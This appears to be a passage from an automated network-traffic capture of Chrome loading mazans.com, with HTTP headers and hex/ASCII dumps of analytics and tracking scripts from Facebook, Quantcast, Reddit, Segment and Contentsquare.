                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 76 65 6e 74 73 22 29 3b 76 61 72 20 6c 3d 62 2e 66 69 72 65 64 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 2c 62 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: dules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET"),j=f.getFbeventsModules("signalsFBEventsSendXHR");b=f.getFbeventsModules("SignalsFBEventsEvents");var l=b.fired;function m(a,b){v
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16384INData Raw: 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ay(a)||a==null)throw new g();return a}}function s(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"&&typeof a!=="string"||Array.isArray(a)||a==null)throw new g();return a}}function t(){return function(a){if(typeof a!=="function"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          69192.168.2.174988091.228.74.1664436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC372OUTGET /aquant.js?a=p-de_F6qVUp9bug HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: secure.quantserve.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC295INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 23145
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=604800
                                                                                                                                                                                                                                                                                                                                                                          Etag: "mLYq618hJoRcW1Crupr2OQ=="
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 20 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC16089INData Raw: 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 33 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 71 75 61 6e 74 63 61 73 74 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 71 63 53 65 73 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 72 28 29 3b 72 65 74 75 72 6e 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 28 65 2b 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 25 31 36 7c 30 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC7056INData Raw: 31 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 3f 5a 28 65 29 3a 5f 28 65 2c 21 30 29 2c 6f 3d 21 30 7d 2c 65 3d 30 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 28 74 3d 44 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 5b 65 5d 2c 30 29 29 2e 73 70 6c 69 63 65 28 31 2c 30 2c 6e 29 2c 4a 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 3b 72 3d 21 31 2c 71 65 26 26 4b 28 29 7d 72 65 74 75 72 6e 20 6f 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 61 2c 69 2c 63 2c 75 2c 73 3d 5b 5d 2c 6c 3d 5b 5d 2c 66 3d 74 7c 7c 5f 3b 69 66 28 28 72 3d 44 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 32 29 29 26 26 72 2e 6c 65 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1;if(arguments.length){for(n=function(e){r?Z(e):_(e,!0),o=!0},e=0;e<arguments.length;e++)(t=De.call(arguments[e],0)).splice(1,0,n),J.apply(null,t);r=!1,qe&&K()}return o},J=function(e,t){var n,r,o,a,i,c,u,s=[],l=[],f=t||_;if((r=De.call(arguments,2))&&r.len


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          70192.168.2.1749882151.101.193.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC403OUTGET /ads/conversions-config/v1/pixel/config/t2_i1au5p4_telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 86
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          cache-control: max-age=300
                                                                                                                                                                                                                                                                                                                                                                          content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                          Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC86INData Raw: 7b 22 76 65 72 73 69 6f 6e 5f 68 61 73 68 22 3a 22 34 39 32 36 37 62 63 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 73 74 61 74 69 63 2e 63 6f 6d 2f 61 64 73 2f 34 39 32 36 37 62 63 65 2f 70 69 78 65 6c 2e 6a 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          71192.168.2.1749883151.101.65.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC371OUTGET /pixels/t2_i1au5p4/config HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel-config.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 27
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC27INData Raw: 1f 8b 08 00 00 00 00 00 00 ff aa ae e5 02 04 00 00 ff ff 06 b0 a1 dd 03 00 00 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          72192.168.2.1749884104.26.4.394436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC406OUTGET /x/45414/httpsmazanscomWEBID6672849687924zerobotemailEMAIL_REDACTED.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: jscloud.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC826INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          last-modified: Thu, 16 Jan 2020 10:42:21 GMT
                                                                                                                                                                                                                                                                                                                                                                          vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYR3dD%2FjteTTKh93RbMyqHew%2B2rtLij4VJr6iN8M8pGuqeXNWh4K3DjBaRREfbZbb5KSbECeJ1KLnQqil5i9upMwVGleP81Xgzkifq%2FBEt4dmpPiPu0%2B7mGwUiy5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8e2023c23a4475eb-SEA
                                                                                                                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=48388&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2824&recv_bytes=984&delivery_rate=59884&cwnd=32&unsent_bytes=0&cid=dc653e817a7caa39&ts=414&x=0"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC32INData Raw: 31 61 0d 0a 7b 22 65 72 72 6f 72 22 3a 22 46 49 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1a{"error":"FILE_NOT_FOUND"}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          73192.168.2.174988799.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC408OUTGET /analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 9270
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Sun, 22 Sep 2024 07:45:31 GMT
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Sep 2024 16:09:56 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "00e9c65cbba11c07c4bf4a6e2727b8ea"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: s5qtRJFv7hDXMk2uMHhT5A4n.cM7M8To
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 163be08bc1bc44818353c4fd88655bee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: EohZ0tLI4o8trTobGMhMeC0vW8r3fZemmoDX0d7Z04_V3jJddJMh-w==
                                                                                                                                                                                                                                                                                                                                                                          Age: 4524226
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC9270INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 36 34 5d 2c 7b 39 32 35 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 69 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 76 61 72 20 69 2c 65 3b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 65 6e 61 62 6c 65 64 29 3f 6e 2e 65 6e 61 62 6c 65 64 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[464],{9254:function(t,n,i){function e(t,n){var i,e;return"boolean"==typeof(null==n?void 0:n.enabled)?n.enabled:null===(e=null===(i=null==t?void 0:t


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          74192.168.2.174988818.244.18.1154436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC533OUTGET /uxa/8bbf67c487693.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.contentsquare.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC687INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 127714
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 11 Nov 2024 20:28:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "d7b0f8e4446c8b2519ae2df84d5228fc"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=900
                                                                                                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 b2d59a81483e9c35443be57826cea9fa.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: YzC6pyQy9IQusa4vXJFb7H-TXLBSrl0wfzYvtXVHxIoqskZAwJH80Q==
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          age: 0
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC15697INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd f9 5e dc c8 d2 28 f8 ff 3c 05 e8 fa 70 a4 b6 28 03 de ba ab 5a e6 2b 43 d9 c6 66 6b 0a bc d1 34 23 aa 12 50 bb 90 b0 a4 c2 a6 a1 e6 37 cf 32 8f 36 4f 32 11 91 bb 94 aa c2 ed ee 33 df bd b7 cf 62 4a b9 46 66 46 46 46 44 46 44 5e c5 f9 dc 5a ff 78 6d 67 fb 45 74 e3 25 45 7f eb b9 d7 3e 8d 47 05 0b bd cb 3c fb 9d 0d ca 8d a1 d7 fe f1 d1 d3 e5 95 d0 2b ca b8 1c 17 5e 7b 39 f4 ce b3 a2 4c e3 0b 06 5f 87 9e 77 14 7a 83 3c 2b 8a f5 ec 22 4e d2 fd 3c 1e 7c 4a d2 33 af bd 64 a5 f7 21 6d c4 36 4e 73 a8 67 97 c9 d2 82 a5 e5 1e fb 3c 4e 72 36 a4 b4 78 34 ca be f4 c7 27 43 aa ca 3b bd 4a 8a a4 cc f2 b5 2c fb 94 b0 fd e4 82 65 e3 d2 6b 3f 7c b4 fc e4 d1 12 fd 07 40 8c 2f 2e 47 6c 2f 2e 19 d4 c0 84 9c 5d 8e e2 eb 3d 36 c8 f2 21 f4 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ^(<p(Z+Cfk4#P726O23bJFfFFFDFD^ZxmgEt%E>G<+^{9L_wz<+"N<|J3d!m6Nsg<Nr6x4'C;J,ek?|@/.Gl/.]=6!'
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1235INData Raw: b7 50 69 23 c3 db 7e 83 5b b5 61 7b ca 57 13 0c 48 d8 51 47 1d 5f a8 dc 13 cc 7f aa 16 87 82 dc 91 17 4f ce d5 3c 14 f5 c3 b8 fc 64 fc e5 50 8a d1 67 48 d5 7e de 30 45 84 a4 7e 75 a4 f6 00 1c 5b a2 46 89 f4 20 6a 93 26 61 8b 5c 62 4d 65 29 d8 11 df 0d 26 8f 1c dc a0 1b fa f6 ce fe 71 7f bf bb b7 df 5b e7 96 9d fa 1b 0e 44 28 b0 b3 db db 3e de d8 3e de dd db 79 89 92 02 d9 83 56 13 8d a2 2f ba 1b 9b d0 d6 8a 2c c5 bf 79 81 bd 5e 77 fd 03 45 75 a7 5f de c4 cf 00 6f 32 ad 2b 1a 37 6d 56 ce 49 98 3b 1d 3d 48 24 95 44 a6 98 09 c6 50 08 bc 03 c4 4b ba cd 04 e1 df 18 94 38 8f b2 e7 ac 0f 3b 77 28 88 9d 94 9e e5 81 b8 81 57 1c 67 f4 32 98 b0 be e0 61 15 a3 82 8d 4e c5 6f c9 98 8b f0 a4 d5 d8 24 22 ec b0 07 9c 33 67 a5 17 bd 69 d4 a5 14 88 64 07 70 b7 68 6a c5 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Pi#~[a{WHQG_O<dPgH~0E~u[F j&a\bMe)&q[D(>>yV/,y^wEu_o2+7mVI;=H$DPK8;w(Wg2aNo$"3gidphj(
